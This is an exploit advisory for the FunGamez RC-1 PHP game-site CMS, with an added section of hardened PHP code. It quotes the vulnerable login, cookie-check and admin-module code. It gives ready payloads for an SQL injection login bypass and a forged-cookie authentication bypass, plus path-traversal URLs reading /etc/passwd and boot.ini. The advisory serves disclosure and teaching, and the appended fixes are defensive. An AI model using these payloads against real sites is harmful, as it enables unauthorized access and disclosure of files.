Multiple Remote Vulnerabilities--SQLi-(INSECURE-COOKIE-HANDLING)-LFI

----------------------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES  FunGamez-release candidate 1
----------------------------------------------------------------------

   CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/fg-gsm/
-->DOWNLOAD: http://sourceforge.net/projects/fg-gsm/
-->DEMO: N/A
-->CATEGORY: CMS / Portals
-->DESCRIPTION: A game-site manager with fully customisable design, and easy game adding
                and I will build in more options to make the site fully customisable...

  CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK: N/A
-->CATEGORY: AUTH BYPASS/LFI
-->AFFECTED VERSION: RC-1
-->Discovered Bug date: 2009-04-20
-->Reported Bug date: 2009-04-20
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.

/////////////////////////////

AUTH BYPASS (LOGIN FORM)

/////////////////////////////

-----------
BUG FILES:
-----------

Path --> [HOME_PATH]/pages/login.php

Its contents:

...

	// $uname and $upass are concatenated into the query string unescaped
	$logindat = mysql_query("SELECT * FROM `fg_users` WHERE `username` = '".$uname."' and `password` = '".$upass."'");

...

---------
EXPLOIT:
---------

Username: PEPE' OR 1=1 /*

Password: ANY

////////////////////////////////////////

AUTH BYPASS (INSECURE COOKIE HANDLING)

////////////////////////////////////////

-----------
BUG FILES:
-----------

Path --> [HOME_PATH]/includes/user.php

Its contents:

...

function checklogin(){

	If ( $_SESSION['user'] == null )  {

		If ( $_COOKIE['user'] == null )   {
			return 0;
		}
		Else
		{
			// the client-supplied cookie value is returned without any verification
			return $_COOKIE['user'];
		}
	}
	Else
	{
		return $_SESSION['user'];
	}
}

...

Path --> [HOME_PATH]/index.php

Its contents:

...

If ( $page->requireslogin($name) && !$user->checklogin() ) { $name = 'login'; $_GET['newlogin'] = 1; }

...

----------
EXPLOITS:
----------

Add cookie:

1) user=1 path=/ (Insecure cookie)

2) user=pepe' or 1=1 /* path=/ (SQL injection)

///////////////////////////////

LOCAL FILE INCLUSION (LFI)

///////////////////////////////

------------
CONDITIONS:
------------

Need: Be admin user (above! :P)

-----------
BUG FILES:
-----------

Path --> [HOME_PATH]/admin/load.php

Its contents:

...

If ( !isset($_GET['module']) ) $mod = 'start';

If ( isset($_GET['module']) ) $mod = $_GET['module'];

// $mod comes straight from the query string and is used to build the include path
include('./admin/modules/'.$mod.'.php');

----------
EXPLOITS:
----------

1) http://[HOST]/FunGamez/index.php?admin&module=../../../../../../boot.ini%00

2) http://[HOST]/FunGamez/index.php?admin&module=../../../../../etc/passwd%00

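Hardened counterparts for the three code paths quoted above, as an added example (not FunGamez project code and not a vendor patch; the advisory lists the bugs as not fixed). It assumes a PDO connection, a session already started with session_start(), an `id` column and a password column holding password_hash() output in `fg_users`, and a fixed set of admin modules; the function names fg_login, fg_checklogin and fg_module_path and the module list are hypothetical.

```php
<?php
// Added example: hardened sketches of the three quoted code paths.
// Function names, the `id` column, the hashed-password column and the
// module list are assumptions, not taken from the FunGamez source.

// 1) Login: bound parameters instead of string concatenation, and a hash
//    comparison in PHP instead of matching the password inside the query.
function fg_login(PDO $db, string $uname, string $upass): bool
{
    $stmt = $db->prepare('SELECT `id`, `password` FROM `fg_users` WHERE `username` = ?');
    $stmt->execute([$uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($upass, $row['password'])) {
        return false;
    }
    session_regenerate_id(true);            // fresh session id after authentication
    $_SESSION['user'] = (int) $row['id'];
    return true;
}

// 2) Login check: only server-side session state counts. $_COOKIE['user'] is
//    client-controlled and is never consulted.
function fg_checklogin(): int
{
    return isset($_SESSION['user']) ? (int) $_SESSION['user'] : 0;
}

// 3) Admin module loader: the request value is only compared against a fixed
//    list, so no user-supplied string is ever concatenated into the include path.
function fg_module_path(?string $requested): string
{
    $allowed = ['start', 'games', 'users'];  // hypothetical module names
    $mod = in_array($requested, $allowed, true) ? $requested : 'start';
    return './admin/modules/' . $mod . '.php';
}

// Constructed inputs: a missing value, a listed module, and a traversal string.
// Anything not on the list resolves to the default 'start' module.
foreach ([null, 'games', '../../../../../etc/passwd'] as $in) {
    echo var_export($in, true), ' => ', fg_module_path($in), PHP_EOL;
}
```
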
*******************************************************************
 SPECIAL THANKS TO: JosS and every H4ck3r(all who do hack0wn)!
*******************************************************************
-------------------------------------------------------------------
*******************************************************************
 GREETZ TO: Str0ke and all spanish Hack3Rs community!
*******************************************************************

-------------------EOF---------------------------------->>>ENJOY IT!